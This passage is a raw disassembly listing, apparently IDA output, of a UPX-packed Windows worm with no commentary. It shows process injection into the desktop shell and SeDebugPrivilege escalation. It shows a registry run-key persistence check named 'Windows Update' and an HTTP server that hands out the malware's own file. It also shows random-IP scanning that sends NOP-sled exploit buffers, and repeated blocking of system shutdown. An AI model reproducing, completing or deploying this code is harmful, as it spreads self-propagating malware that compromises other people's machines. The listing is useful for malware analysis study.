cmp eax, 0FFFFFFFFh
jz loc_31601D26
push 0
push 0DEh
push offset dword_316046B8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
cmp eax, 46h
jl loc_31601D26
cmp [ebp+var_730], 31h
jnz loc_31601BD1
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31602C96 ; memset
add esp, 0Ch
push offset byte_316042B8
call dword_31601084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_316042B8
push eax
call sub_31602CA2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31601084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31602CA2 ; memcpy
mov eax, dword_31604BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_31601A72: ; CODE XREF: sub_316017DB+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
push 0
push 68h
push offset dword_316047FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
push 0
push 0A0h
push offset dword_31604868
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
cmp [ebp+arg_0], 0
jz loc_31601CC1
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31604A20
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31602CA2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31604A8C
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31602CA2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31604B00
push eax
call sub_31602CA2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31601D19
; ---------------------------------------------------------------------------
loc_31601BD1: ; CODE XREF: sub_316017DB+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31602C96 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31604BF8
push eax
call sub_31602CA2 ; memcpy
push offset byte_316042B8
call sub_31602C9C ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_316042B8
push eax
call sub_31602CA2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31604C70
push eax
call sub_31602CA2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31604BF8
push eax
call sub_31602CA2 ; memcpy
add esp, 40h
push offset byte_316042B8
call sub_31602C9C ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_316042B8
push eax
call sub_31602CA2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31601C6D: ; CODE XREF: sub_316017DB+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31601C6D
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31602C96 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31602C96 ; memset
add esp, 18h
jmp loc_31601A72
; ---------------------------------------------------------------------------
loc_31601CC1: ; CODE XREF: sub_316017DB+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3160490C
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31602CA2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3160498C
push eax
call sub_31602CA2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31601D19: ; CODE XREF: sub_316017DB+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31601D26: ; CODE XREF: sub_316017DB+1AD�j
; sub_316017DB+1E1�j ...
push 2
push [ebp+var_4]
call dword_31601170 ; shutdown
loc_31601D31: ; CODE XREF: sub_316017DB+166�j
push [ebp+var_4]
call dword_31601174 ; closesocket
pop esi
loc_31601D3B: ; CODE XREF: sub_316017DB+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_316017DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601D42 proc near ; CODE XREF: UPX0:loc_31602350�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_316010A8 ; LoadLibraryA
mov esi, dword_316010A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31601DC6
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31601DC6
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31601DC6
lea eax, [ebp+var_C]
push eax
push 20h
call dword_316010A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31601DC6: ; CODE XREF: sub_31601D42+28�j
; sub_31601D42+37�j ...
pop edi
pop esi
leave
retn
sub_31601D42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601DCA proc near ; CODE XREF: UPX0:31602364�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31604FE0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_316010B4 ; GetModuleHandleA
mov esi, dword_316010A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31601E11
loc_31601E0D: ; CODE XREF: sub_31601DCA+54�j
push 1
jmp short loc_31601E62
; ---------------------------------------------------------------------------
loc_31601E11: ; CODE XREF: sub_31601DCA+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31601E0D
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31601110 ; FindWindowA
test eax, eax
jnz short loc_31601E3F
call dword_31601114 ; GetForegroundWindow
test eax, eax
jnz short loc_31601E3F
push 2
jmp short loc_31601E62
; ---------------------------------------------------------------------------
loc_31601E3F: ; CODE XREF: sub_31601DCA+65�j
; sub_31601DCA+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31601118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_316010B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31601E65
push 3
loc_31601E62: ; CODE XREF: sub_31601DCA+45�j
; sub_31601DCA+73�j
pop eax
jmp short loc_31601ED0
; ---------------------------------------------------------------------------
loc_31601E65: ; CODE XREF: sub_31601DCA+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3160107C
test eax, eax
jz short loc_31601EC3
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_316010AC ; WriteProcessMemory
push dword_31604FD4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31601EAF
push eax
call esi ; CloseHandle
jmp short loc_31601ECA
; ---------------------------------------------------------------------------
loc_31601EAF: ; CODE XREF: sub_31601DCA+DE�j
push offset aUterm18 ; "uterm18"
call sub_31601F03
pop ecx
mov [ebp+var_4], 5
jmp short loc_31601ECA
; ---------------------------------------------------------------------------
loc_31601EC3: ; CODE XREF: sub_31601DCA+B2�j
mov [ebp+var_4], 4
loc_31601ECA: ; CODE XREF: sub_31601DCA+E3�j
; sub_31601DCA+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31601ED0: ; CODE XREF: sub_31601DCA+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31601DCA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601ED5 proc near ; CODE XREF: sub_3160219E+B�p
; UPX0:31602326�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_316010B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_316010EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31601ED5 endp
; =============== S U B R O U T I N E =======================================
sub_31601F03 proc near ; CODE XREF: sub_31601DCA+EA�p
; UPX0:31602330�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_316010BC ; CreateMutexA
retn
sub_31601F03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601F12 proc near ; CODE XREF: sub_3160238C+147�p
; sub_3160238C+152�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_316010C0 ; CreateThread
pop ebp
retn
sub_31601F12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601F2C proc near ; CODE XREF: sub_3160219E+12C�p
; sub_3160258F+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_316010C0 ; CreateThread
push eax
call dword_3160107C ; CloseHandle
pop ebp
retn
sub_31601F2C endp
; =============== S U B R O U T I N E =======================================
sub_31601F4D proc near ; CODE XREF: sub_316011A0+68�p
; sub_31602A60+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31601F75
loc_31601F5E: ; CODE XREF: sub_31601F4D+26�j
call dword_316010FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31601F5E
loc_31601F75: ; CODE XREF: sub_31601F4D+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31601F4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601F7D proc near ; CODE XREF: sub_316011A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31602C96 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_316010C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3160107C
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31601F7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601FD3 proc near ; CODE XREF: sub_31602617+3E�p
; sub_316026DE+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3160114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31601FF4
call dword_31601150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31601FF4: ; CODE XREF: sub_31601FD3+15�j
lea eax, [ebp+var_34]
push eax
call dword_31601154 ; gethostbyname
test eax, eax
jnz short loc_31602009
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31602009: ; CODE XREF: sub_31601FD3+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31601FD3 endp
; =============== S U B R O U T I N E =======================================
sub_31602012 proc near ; CODE XREF: sub_3160169C+C�p
; sub_3160252B+22�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31601130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31602012 endp
; =============== S U B R O U T I N E =======================================
sub_31602028 proc near ; CODE XREF: sub_3160238C+D8�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_316010CC ; OpenEventA
test eax, eax
jz short locret_31602041
push eax
call dword_316010C8 ; SetEvent
locret_31602041: ; CODE XREF: sub_31602028+10�j
retn
sub_31602028 endp
; =============== S U B R O U T I N E =======================================
sub_31602042 proc near ; CODE XREF: sub_3160169C+39�p
push esi
mov esi, dword_316010FC
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31602042 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31602058 proc near ; DATA XREF: sub_3160219E+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31602089
push 1
jmp loc_31602144
; ---------------------------------------------------------------------------
loc_31602089: ; CODE XREF: sub_31602058+28�j
mov esi, dword_31601104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31602154
lea eax, [ebp+var_100]
push offset dword_316041F0
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31602154
mov esi, dword_31601168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_31604FD0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3160111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31602C9C ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_31602106: ; CODE XREF: sub_31602058+E8�j
mov eax, dword_31604FD0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31602118
mov eax, ecx
loc_31602118: ; CODE XREF: sub_31602058+BC�j
test eax, eax
jz short loc_31602147
push 0
push eax
mov eax, dword_31604FC8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31602142
cmp eax, 1000h
jb short loc_31602147
push 64h
add edi, eax
call dword_31601094 ; Sleep
jmp short loc_31602106
; ---------------------------------------------------------------------------
loc_31602142: ; CODE XREF: sub_31602058+D5�j
push 2
loc_31602144: ; CODE XREF: sub_31602058+2C�j
pop eax
jmp short loc_31602197
; ---------------------------------------------------------------------------
loc_31602147: ; CODE XREF: sub_31602058+C2�j
; sub_31602058+DC�j
push offset dword_31604FCC
call dword_316010D4 ; InterlockedIncrement
jmp short loc_31602172
; ---------------------------------------------------------------------------
loc_31602154: ; CODE XREF: sub_31602058+49�j
; sub_31602058+61�j
mov esi, dword_31601168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31604D38
push ebx
call esi ; send
loc_31602172: ; CODE XREF: sub_31602058+FA�j
push 7D0h
call dword_31601094 ; Sleep
push 2
push ebx
call dword_31601170 ; shutdown
push ebx
call dword_31601174 ; closesocket
push 0
call dword_316010D0 ; ExitThread
xor eax, eax
loc_31602197: ; CODE XREF: sub_31602058+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31602058 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160219E proc near ; DATA XREF: sub_3160238C+142�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31601ED5
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31604FCC, ebx
call sub_3160284E
add esp, 14h
test eax, eax
jnz loc_316022D3
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31601080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_3160220A
push 1
call dword_316010D0 ; ExitThread
loc_3160220A: ; CODE XREF: sub_3160219E+62�j
push ebx
push esi
call dword_316010DC ; GetFileSize
push eax
mov dword_31604FD0, eax
call sub_31602C6A
pop ecx
mov dword_31604FC8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31604FD0
push eax
push esi
call dword_316010D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31604FD0, eax
call dword_3160107C ; CloseHandle
push ebx
push 1
push 2
call dword_31601158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31602C96 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_3160226C: ; CODE XREF: sub_3160219E+E5�j
; sub_3160219E+ED�j ...
call dword_316010FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31604FDC, eax
jz short loc_3160226C
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_3160226C
push eax
call dword_31601160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31601140 ; bind
test eax, eax
jnz short loc_3160226C
push 64h
push edi
call dword_31601144 ; listen
mov [ebp+var_8], esi
pop esi
loc_316022B5: ; CODE XREF: sub_3160219E+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31601148 ; accept
push eax
push offset sub_31602058
call sub_31601F2C
pop ecx
pop ecx
jmp short loc_316022B5
; ---------------------------------------------------------------------------
loc_316022D3: ; CODE XREF: sub_3160219E+3D�j
push ebx
call dword_316010D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_3160219E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316022E2 proc near ; CODE XREF: sub_3160238C:loc_316024C8�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3160113C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_316022E2 endp
; ---------------------------------------------------------------------------
push 0
call dword_316010B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31604FE0, eax
call dword_31601074 ; DeleteFileA
call sub_31601ED5
push offset aUterm18 ; "uterm18"
call sub_31601F03
pop ecx
mov dword_31604FD4, eax
call dword_316010E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31602350
push 1
call dword_316010E0 ; ExitProcess
loc_31602350: ; CODE XREF: UPX0:31602346�j
call sub_31601D42
call sub_316029B2
call sub_31602B2C
push offset sub_3160238C
call sub_31601DCA
test eax, eax
pop ecx
jz short loc_31602375
push 0
call sub_3160238C
loc_31602375: ; CODE XREF: UPX0:3160236C�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31602378 proc near ; CODE XREF: sub_3160238C:loc_316024F1�p
; sub_3160252B:loc_31602544�p ...
push 0
push dword_31604FD8
call dword_31601070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31602378 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160238C proc near ; CODE XREF: UPX0:31602370�p
; DATA XREF: UPX0:3160235F�o
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31601190
push offset sub_31602C90
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov [ebp+var_68], offset aU10x ; "u10x"
mov [ebp+var_64], offset aU11x ; "u11x"
mov [ebp+var_60], offset aU12x ; "u12x"
mov [ebp+var_5C], offset aU13x ; "u13x"
mov [ebp+var_58], offset aU14x ; "u14x"
mov [ebp+var_54], offset aU15x ; "u15x"
mov [ebp+var_50], offset aU16x ; "u16x"
mov [ebp+var_4C], offset aU17x ; "u17x"
mov [ebp+var_48], offset aU8 ; "u8"
mov [ebp+var_44], offset aU9 ; "u9"
mov [ebp+var_40], offset aU10 ; "u10"
mov [ebp+var_3C], offset aU11 ; "u11"
mov [ebp+var_38], offset aU12 ; "u12"
mov [ebp+var_34], offset aU13 ; "u13"
mov [ebp+var_30], offset aU13i ; "u13i"
mov [ebp+var_2C], offset aU14 ; "u14"
mov [ebp+var_28], offset aU15 ; "u15"
mov [ebp+var_24], offset aU16 ; "u16"
mov [ebp+var_20], offset aU17 ; "u17"
mov [ebp+var_1C], offset aU18 ; "u18"
push offset aU18x ; "u18x"
xor edi, edi
push edi
push 1
push edi
call dword_3160106C ; CreateEventA
mov dword_31604FD8, eax
mov [ebp+var_4], edi
mov [ebp+var_6C], edi
loc_31602457: ; CODE XREF: sub_3160238C+E1�j
cmp [ebp+var_6C], 8
jnb short loc_3160246F
mov eax, [ebp+var_6C]
push [ebp+eax*4+var_68]
call sub_31602028
pop ecx
inc [ebp+var_6C]
jmp short loc_31602457
; ---------------------------------------------------------------------------
loc_3160246F: ; CODE XREF: sub_3160238C+CF�j
mov [ebp+var_6C], edi
loc_31602472: ; CODE XREF: sub_3160238C+FC�j
cmp [ebp+var_6C], 0Ch
jnb short loc_3160248A
mov eax, [ebp+var_6C]
push [ebp+eax*4+var_48]
call sub_31601F03
pop ecx
inc [ebp+var_6C]
jmp short loc_31602472
; ---------------------------------------------------------------------------
loc_3160248A: ; CODE XREF: sub_3160238C+EA�j
cmp [ebp+arg_0], edi
jz short loc_316024C8
push offset aWs2_32 ; "ws2_32"
mov esi, dword_316010A8
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm18 ; "uterm18"
call sub_31601F03
pop ecx
mov dword_31604FD4, eax
loc_316024C8: ; CODE XREF: sub_3160238C+101�j
call sub_316022E2
push edi
push offset sub_3160219E
call sub_31601F12
push edi
push offset sub_3160169C
call sub_31601F12
push edi
push offset loc_3160273A
call sub_31601F12
add esp, 18h
loc_316024F1: ; CODE XREF: sub_3160238C+180�j
call sub_31602378
test eax, eax
jnz short loc_3160250E
push edi
call dword_31601018 ; AbortSystemShutdownA
push 1388h
call dword_31601094 ; Sleep
jmp short loc_316024F1
; ---------------------------------------------------------------------------
loc_3160250E: ; CODE XREF: sub_3160238C+16C�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_3160238C endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160252B proc near ; DATA XREF: sub_3160258F+55�o
; sub_31602617+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3160253A
push 1
pop eax
jmp short locret_3160258B
; ---------------------------------------------------------------------------
loc_3160253A: ; CODE XREF: sub_3160252B+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31602544: ; CODE XREF: sub_3160252B+5A�j
call sub_31602378
test eax, eax
jnz short loc_31602587
call sub_31602012
test eax, eax
jz short loc_31602587
cmp [ebp+var_1], bl
jz short loc_31602580
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_316017DB
movzx esi, word_31604FEC
pop ecx
call dword_316010FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31601094 ; Sleep
loc_31602580: ; CODE XREF: sub_3160252B+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31602544
loc_31602587: ; CODE XREF: sub_3160252B+20�j
; sub_3160252B+29�j
pop esi
xor eax, eax
pop ebx
locret_3160258B: ; CODE XREF: sub_3160252B+D�j
leave
retn 4
sub_3160252B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160258F proc near ; DATA XREF: sub_31602617+7E�o
; UPX0:316027CF�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3160259D
push 1
pop eax
jmp short loc_31602613
; ---------------------------------------------------------------------------
loc_3160259D: ; CODE XREF: sub_3160258F+7�j
push ebx
push esi
push edi
call sub_31601ED5
mov esi, dword_316010FC
xor ebx, ebx
loc_316025AD: ; CODE XREF: sub_3160258F+7D�j
call sub_31602378
test eax, eax
jnz short loc_3160260E
call sub_31602012
test eax, eax
jz short loc_3160260E
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31604FE4
mov byte ptr [ebp+arg_0+3], al
call dword_316010D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_316017DB
test eax, eax
pop ecx
jnz short loc_316025F0
push [ebp+arg_0]
push offset sub_3160252B
call sub_31601F2C
pop ecx
pop ecx
loc_316025F0: ; CODE XREF: sub_3160258F+50�j
movzx edi, word_31604FEC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_31601094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_316025AD
loc_3160260E: ; CODE XREF: sub_3160258F+25�j
; sub_3160258F+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31602613: ; CODE XREF: sub_3160258F+C�j
pop ebp
retn 4
sub_3160258F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
